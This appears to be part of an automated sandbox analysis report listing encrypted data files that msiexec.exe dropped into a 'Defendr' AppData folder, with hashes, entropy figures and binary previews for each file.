Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...!........Ay.(P..k.........w.bE...?.L...W......z.fe......I2...d..y.n..N..F.T=...[....Bzm.8.cD.YV....Y.NR.....pS..=.G..7.Q.k.bHH.....~sv5gC.$..ns69+..i..........a.]..Z0..O...T...2.\.......Z....?.....E.0./..e+.?hDV..5H..`..B`Y.3T...........TS.dE+..1y..C.9.<...f..E.K:...R.a.....q.......ga..X....!"..BW.B../.2A.661....y..C.....r,.Y.V+..U}Z..j.2R......P....[`y.>s?.w.....N4..z.jDKc..#.X.q.(<;..h.p>#9.Y.V\|......X.m.:^..(.F.m.R.....{.K..........KY.c...e^..A]SN,1.S....ow......P.c..}...d.`59V.E\|.D.(....6.gmi..$..}..Bv!.d"Q.......m.HR$w!.....;...X{s.b!.;...VV......6.1...c...8...z..0.zke..K..2K.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv47.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	89125
Entropy (8bit):	7.998059583264308
Encrypted:	true
SSDEEP:	1536:3VbDgMEb5eSQUmNQnPmYBbU5/VqU1H1X1/1wenEm0IHEbd3pzDqBOot/8MVnW0YZ:3V5IjQnNiPmYxm/L1Z1wenEEEbj0p58F
MD5:	80D5F631C0C99F56A4F95A4398D5753F
SHA1:	A05A2BACCB9C0C2C412D83246FE2E8BAB03AE801
SHA-256:	9C67AABD5894663D4A71D7605753681861C4807A113E554ED5EFE3A6637B57F2
SHA-512:	D1E07976B24BF196E90CCA67178734EB01C704F40562FF62B735C4CFDA2606CB106345041876C7625ADE4737123DDD966FE4C7122A1033B08FC856F299B2C787
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...!........Ay.(P..k.........w.bE...?.L...W......z.fe......I2...d..y.n..N..F.T=...[....Bzm.8.cD.YV....Y.NR.....pS..=.G..7.Q.k.bHH.....~sv5gC.$..ns69+..i..........a.]..Z0..O...T...2.\.......Z....?.....E.0./..e+.?hDV..5H..`..B`Y.3T...........TS.dE+..1y..C.9.<...f..E.K:...R.a.....q.......ga..X....!"..BW.B../.2A.661....y..C.....r,.Y.V+..U}Z..j.2R......P....[`y.>s?.w.....N4..z.jDKc..#.X.q.(<;..h.p>#9.Y.V\|......X.m.:^..(.F.m.R.....{.K..........KY.c...e^..A]SN,1.S....ow......P.c..}...d.`59V.E\|.D.(....6.gmi..$..}..Bv!.d"Q.......m.HR$w!.....;...X{s.b!.;...VV......6.1...c...8...z..0.zke..K..2K.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv47.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	21103
Entropy (8bit):	7.99184395160347
Encrypted:	true
SSDEEP:	384:1FAWMNOXM3Le0eDPfrlvKhNHvbysE05FT2jBgf5HFzB5+gcJGaIlK2cN:1FMrLULlcHOiFTeKf4WM20
MD5:	7A962A158FAC54BEFD5EA4277A549457
SHA1:	414925688F195194FC8BF8363F75395EBFB6638E
SHA-256:	76EA5441F6A6D54B07B269CFEDB92802AE31C66ABDB1AF4FB9ADC822A5C56BB3
SHA-512:	626DB8B51CAF686AD08AE061E6AFD940A9B8304C5248E546D0425ED333673D1DA63897C75B68E06F015FC00DB0AD754364767FDF655EADA36C262D4DC0818E4C
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U......U._..(...&...l.F4.@..R ........~.....Q....P{.cM...K4..\|o.C....jQ..y.)..p.......J..a......j}.A$:......<.z&.?!u].h...E9.n....v.=.....X ..q.i.....#../"~...?5;....LK.(.&:b..n.<......ev.i.)>.4.....EU.^...%b .....aG..%..\|1ql..'O.M..:cs..w...P...tgkF....3.Dp@..z6$.9r..M:.";?..'>QQ.s.. ........C.)+<...!"/.._....}w.q.O..E.+....u.8r.wE.I.9.?.b.....e.a.....DHR..z..+y..-7O.5'...6...c...=v......X..C....m...........V....m..l..VZ"...8.Z...=.Q{z.v.i ....;&.Q....0x....7K.{Y.....M.M'r...,.....,....:3_.].qx..^.bm.[.a8.......7;.Y2..Y....lx.............\....=.1..u.Y.H.....m..."..aZg.Z.n..t.\|l..O .

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.3.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	85952
Entropy (8bit):	7.997723746290305
Encrypted:	true
SSDEEP:	1536:C+uxy76lXk9ZBFLYZmJuPx8u6nkVj20LobXHK0xwrhXC89cQ5iIxloOXZMnwN6:C+mg6leZBJuPyu6nkVjzobaZSQFoOXZc
MD5:	1AB21C5CE52A3B96BDD9CEAD9FDF91F2
SHA1:	C9DFD5ED7BE1A3FBEC25E571A2DDA485661DC50C
SHA-256:	7A41283A414F42D601DBCC159237BAB46053F34E54617E5B5C46F71DEC29D35E
SHA-512:	A8E2EB103DCA9B0BFD293C84D7E8B13C610BD28ABE697327AF4C6FF1FE5D5B693DED1D2D5AC8F853F96A527903E9D77B021C0844418044125A06EF2CDBDD32A7
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...{w...<0.......N.r4..T..yZ..U..G.....r`?.}..A....'as..a....D..-W...!.A..P=..M.L........TY........[,..u...z`....4.T....2...j....aj.yy>....B...a.l.'..r#J..q.7&...9;!....V..>u...nA.-..:...69.=+U........i....h...K..s#..k@..VL.U....,.n.6S..}......`...e.}....G...?..%.w.M..9:..... ....-.^'+.t...........4/...<.....0G!..X.b._5.....Y3...NHf..d.G..M..7.b....8T.prgS...DK.erP..A...e.....d..I.V&rz9.}.'......W8Ij.-....l9.....#G.t(..&,....ytNoz...]2..k64+Z..M.........mOPX.;]...h.N.C&Q.V.....X.#.O.B\$..q....Cq.MgE..2.j9u.......r..r...U.k....1..8.b0.jW]!.UHN.....8.7..m.Pg~e..e..+X...{..1>~...FJV

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.4.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	66675
Entropy (8bit):	7.997200345251726
Encrypted:	true
SSDEEP:	1536:Zb5PfGKN+w1JgYWhXqYnMYsrhkLaLZjtGbEBd0sea5otHQqGrXi:ZNfGK7gFN2rhkLejqEB+ae6Xi
MD5:	BFF1266CB467298E1BF77139D09345E1
SHA1:	1FDD52F261E8A9B5FD57AF4EE2B8B7BB4EC99B7E
SHA-256:	A35D6A6DF0B4A1D66438B48317D31DF0926500CF03A439413B76C691559DD232
SHA-512:	ABD217D6A0FD94F20209CEDD9A0AF561CAD71DDEBC3B2D7BBB82BF0F9799D143489C9D312565871F29BD7DF54983F52A17F3F27562EAE7AAC8CCD487796C9D91
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U.....5.[.....Pf..V.z......L.#.z.`-I..!.N..u....pM.&..sDYX)U{ t.v_U.ML.w..eg.a.1......R.q...."..K.m..z...{.....`......uG...:...[.....`#....&p...2...x._-....!C...o..o.\..l ...Q.H..h9%.a..'.8.........S4=..Y..d...b...._.. .'..7.5...`@..0..@......cP.0E.....9....g...7\|n.%!a.&.Y`b.8.....A .....L...r...Q...R~..zZ[.3.....H@.c........K..<\|^...Q.0/[..@.<[..#....`?'gn.x..".....7.Z9z9..z.Q.o.....0..:7.O@.......2.gcb.Z0@.&.&..fH?.~...5.`a...s.B...J"B......q.t...!.#......".G......t.`..t..u...3.i.,..#Dz4...\|\|t...".Ll..Z..*..b.f.....`.c..H.K........'..B.k7..sd-O..j-..)Oe#.80#....;.Q..Cb'..r.Y..Smb..{

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.5.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	92378
Entropy (8bit):	7.99814110360773
Encrypted:	true
SSDEEP:	1536:tgnDfdhbCSGXIyETXN5YYY0JLgpaXw6Ued5488BBccIHkBrjAzcvO+z2onUmGa:tWXbCSGXtE9gpaXf4nB+HIrjAzcm+5UY
MD5:	2A8322657D20CCC866150BEBC9630AEB
SHA1:	083C0665D5F92BA9B9C0FA8ABD886FFDE99EA508
SHA-256:	BEF7BC80ADA71D2AD28950C5B2B291513E913B2A65A802CA0384E40759942274
SHA-512:	62B6E106F9E9C55FEB2A706C307005AD13B3C2D15A388088BECC34AEC3EF82D9F9E17E6AF75B5EBBCD3DAFF6EC22EAAAC240CE995B07495F251AFDEC13073A69
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...!........Ay.(P..k.........w.bE...?.L...W......z.fe......I2...d..y.n..N..F.T=...[....Bzm.8.cD.YV....Y.NR.....pS..=.G..7.Q.k.bHH.....~sv5gC.$..ns69+..i..........a.]..Z0..O...T...2.\.......Z....?.....E.0./..e+.?hDV..5H..`..B`Y.3T...........TS.dE+..1y..C.9.<...f..E.K:...R.a.....q.......ga..X....!"..BW.B../.2A.661....y..C.....r,.Y.V+..U}Z..j.2R......P....[`y.>s?.w.....N4..z.jDKc..#.X.q.(<;..h.p>#9.Y.V\|......X.m.:^..(.F.m.R.....{.K..........KY.c...e^..A]SN,1.S....ow......P.c..}...d.`59V.E\|.D.(....6.gmi..$..}..Bv!.d"Q.......m.HR$w!.....;...X{s.b!.;...VV......6.1...c...8...z..0.zke..K..2K.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.6.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	38466
Entropy (8bit):	7.995165443733207
Encrypted:	true
SSDEEP:	768:1/7cEIBwv+fMziSAhjeNhW5iJgAGXykYEZAA0vea6rosyz3sL36/:udfWA0Nhe4NA0veaBz8ru
MD5:	35EF6B79DA388875331B47C2EBC2F47E
SHA1:	C2600F156D2D9CB3A8B951A3C25D5C18BEE3B8B1
SHA-256:	3CBE601BE6588C29EC451529BA99FA9288EA2B9F06FAC2D9EA9FD2ABA17F8D2C
SHA-512:	86E6C72C1B197F91ADE214A0513936C1A46FB8FA26EDB03E2DA8967902EC76401BB613B3D2D987F77CF0692087AFCB01465BE5C1ACF67716757D69F4842A0DF2
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...!........Ay.(P..k.........w.bE...?.L...W......z.fe......I2...d..y.n..N..F.T=...[....Bzm.8.cD.YV....Y.NR.....pS..=.G..7.Q.k.bHH.....~sv5gC.$..ns69+..i..........a.]..Z0..O...T...2.\.......Z....?.....E.0./..e+.?hDV..5H..`..B`Y.3T...........TS.dE+..1y..C.9.<...f..E.K:...R.a.....q.......ga..X....!"..BW.B../.2A.661....y..C.....r,.Y.V+..U}Z..j.2R......P....[`y.>s?.w.....N4..z.jDKc..#.X.q.(<;..h.p>#9.Y.V\|......X.m.:^..(.F.m.R.....{.K..........KY.c...e^..A]SN,1.S....ow......P.c..}...d.`59V.E\|.D.(....6.gmi..$..}..Bv!.d"Q.......m.HR$w!.....;...X{s.b!.;...VV......6.1...c...8....y/}.7.o........

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.7.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	89262
Entropy (8bit):	7.99808539753097
Encrypted:	true
SSDEEP:	1536:SBDbRlbqNtRyZzp9wPK2yZEpbykFf1hyM272MsOvupyNi4DsuuYh9sG:QX2dCx2yZYbXFf1w1vfBDwe+G
MD5:	AB299939F803241F523C0CB4D6B4D0C4
SHA1:	1D76A8DE56E56BADD3488B9DE1C6FCB58FC65074
SHA-256:	A5433FC2217D43866965AC1DD3400E09C43E69CA465DF4CE11AF778E77DA24E0
SHA-512:	1338BE1CCC39312928A8048F3D813A90F521E10FE01DE2141F80894F4413E2A026C8981F5A896132D6A6592313C3166C5E4628D3681258AAE3499B5E2344C9B0
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U.......j..:...].._.~h...H[2.W..H.(....<.Xo2.........!.=.7`..r..}..Z..y..T...N.[0...{kT.k....U@.\|.....<...U..[.2..iD..l#..X..Q..I.".Q..0fP...opoC..._nag..G...H.H...J.<..j..5.$,...U..IO..a...........q..m.....y=.oq...]e.{.t.......P...8q..yT{......@L....sq.$`..c3~.\....^.?r....W.+.A.;.Tu.`s..w&@e.i=.}.......C1b.....[w.s..X..7...0$b.....B.]...&N.../.t'l\yC.*k_.V.....\|..u.......T.R9.dUk..3j..I.6.L.c...I..r.x...+.>.!..-j....;.}...Cov..[mi&....R.vy7........k.fG)lJ...:..../ni.{....L1.M.."z.G.."f...40...`...w.ge.^..7..k...Q_..k.7..<K...P...gK....&p.9.u..z./...l.......^Q...q.n..A.F.......`.j......B.mr..;

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv48.8.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33470
Entropy (8bit):	7.993865224775696
Encrypted:	true
SSDEEP:	768:1xo/WOGzsaLDQvG62vPagGSteIjjdGq1tYY2LsLpEZ+i:eWOGzsaLDQO6WFtjMsRu
MD5:	A95E284BBDCDCC82138270A29DE31376
SHA1:	FB4EB3AF050A86CF27A27B092EA086BB52F5BE07
SHA-256:	F9A5A71B000D9057942813FC2A61D8D5CD2415F5B60E75A1928D4D38EFEDE15F
SHA-512:	4AC1E3354F5FC2596D39B9E1887F06193795214D569A178AE3B3E35CEB706D2BCC10615FC92F7629DE0763F9B6C79B2479444C37388504CBFF37882421699AE5
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U.....'p..~AS.tR.W..o..?ug.....7....p.@..:D....k\$,l2^..I.{.;<.q"[Y..v..r?f.....:#....F.0...;..\|...U..&.t.>.........q.......4.)M..R.la.=....U\.uR&..K...L.D9_....D..?.].h{}.<.......z...&C.]y.;F./.N..T..bq..,..r.".#x6".......&...!..9Rd.k.i.W........D=..d........$....k(...%@..Y.(......tY..;.?>.cq....]6N......d...HJ..GS.x..T.......(.Z.DY!....C..C.pb..Q{..HE ......."..p.h...k....fTas.C..5k.3i4NC... .e:...j"Y7.x.k...4......as08.J...n....\H.....W.j;7-v..D....1o.E..../+..TQI..K.'..694....ze..'.gR....I.q\|..j.1....:y...u.....&M..s.j..{.>....,.5.-.r.f>L.^OZ..g......P..+...q...n.3:;I>fs.Y..>.b..1.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv5.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	90055
Entropy (8bit):	7.99800317558275
Encrypted:	true
SSDEEP:	1536:BW6/qkkUUtEvO438Xq3tgPDnDfNScYDrcjO5H/kNMPE7AEbFAtqWuV7y33:oykUUtEvMqCnfUcYDrf/Qv/8qWEq
MD5:	44ECC1328F59A8E238B7CC0875D8676B
SHA1:	B8E208314A05A58B4C634B65786EAB5396E0A163
SHA-256:	ADA56B7CA45E461C08E8B3DAF1D3B0139ABC31B05DAAC06655FA8A4064D8667C
SHA-512:	E45EF02ECE30F63442A37D8E118C8EA2173B007526F1A8A59EBEFBA73098DA0EB2E3672478FCA75B929EB1D93E91932E5BF9E5275E5F656CD1CCF1BB9B8DEE15
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv5.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	22440
Entropy (8bit):	7.991781976298273
Encrypted:	true
SSDEEP:	384:BW6NhjvQ1XoKt/0bGVsZ7aq5u2DGqEb/LBphHZn4pQgYuxAgdzBnw:BW6NhrQ1Xoq1sgxLqEbLBD3gz1dq
MD5:	B0972A8D56CC2BC157A681D59FB35966
SHA1:	A0D9AC2EABBC73D8F157C7E1468DFF204AED7F02
SHA-256:	B04C2BB17C93C9D202514E8E83FB557F7CDA9197D916A9E786EF3C0D517DC412
SHA-512:	9A1E42597A89728B842CEC70CAF81194BC4CCA368A97BA22EAA31F6AD4DE9EC24911839050D1369D5A270F45355CD4AFEDE8430C0FE74E486759524779052A04
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv6.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99229
Entropy (8bit):	7.998172009274098
Encrypted:	true
SSDEEP:	3072:oB70QLzwr4HrXnZZkbBYb3MBPBaqALCGUtJJ:i7PLzweXnZCm3MFwqMWJ
MD5:	C02DCB97546872D163EFF9D291CDBFD3
SHA1:	0BDA89EA75167768D9A08A1FA6ED6E1CC686EFEB
SHA-256:	03D9526D1AEF606B1FA43C127E7B1141AA568FADE454C1C0060BB9C732E0B626
SHA-512:	66E748A8560A8A2AFEFFB5A176E463B6B0A3E45152E97ED6B2C3E72C616AEC3746D7B5AEB8F87EA97E657C47914680171D7F12FC2221D6D2173533EEB2B45AA3
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv6.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31788
Entropy (8bit):	7.994731967225481
Encrypted:	true
SSDEEP:	768:BW6N6D8t1j8MyZVPL7+dbD1VZMufi2LGxwxt7tno4moX:BW64YtBy21UQisGxwxtRGS
MD5:	7ACBE69D3B767E94BD59B48104364992
SHA1:	647C91290222513C2AB94FFB8A36F70FEFF265B6
SHA-256:	593CD5BA79A489C4388809E17EBCB32AF9B10EBC33C895955E13A06CE8F48C43
SHA-512:	EE5D2EF06A22F741167A5BEB219678BE65B9BFF4F258F0BDEC587DD9A1ACEDED199485B4664C9B870775B105AAB08916DD8FB36912C978030E55EE5A66B38648
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv7.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	97511
Entropy (8bit):	7.998029934840964
Encrypted:	true
SSDEEP:	1536:BW6YRAslfDTP4mykxKthRKjv4UCAnhfIMHsIeIVmwRXuZBDej5l7ahUn70N2x9Ro:oesl77DAhBzmRIGsWR8FejX4i9ib
MD5:	53BFA45DC4DF8F99473480A954EF3981
SHA1:	53A74C7CF7AD41FABB4609C7EEB5BC3428B55B1F
SHA-256:	A0F2039554A03DB416709C08D36012CBF5A8EA313C258A58B7EF43DC947A1AAA
SHA-512:	86E390863EF48232BE511B1035A0B58888EE25FF708C659DB94562DEF0EF6B4A1907EDB00287612DF4F91A13647D9471FC0ACF092E225A009EB9ABC38D4B0A44
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv7.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	30258
Entropy (8bit):	7.994163063127342
Encrypted:	true
SSDEEP:	768:BW6NiqLRJ1pIsEine4QTOvc8k2VIx3b+mUZhFs/eZ:BW6gqHjEjavc/ZsFh
MD5:	F2320A86A314A2B869E484BE85AA6DA2
SHA1:	E4DD98178CC70A9C3861BE10539DD9EE44797F0E
SHA-256:	C0908DBA50A0B348646C7D12E7C2E247EFB76807C7DDB8911E9D4A354ECFD320
SHA-512:	D9C5D20CFC30A1C476B7C75549CE328A8E0DB273BE7D95AAA3682EE9B2B9D5F99FFF38D0B1DEA610B39B22B4B6AD76ADE47E164536D13BB12DAF6D0316BB8C57
Malicious:	false
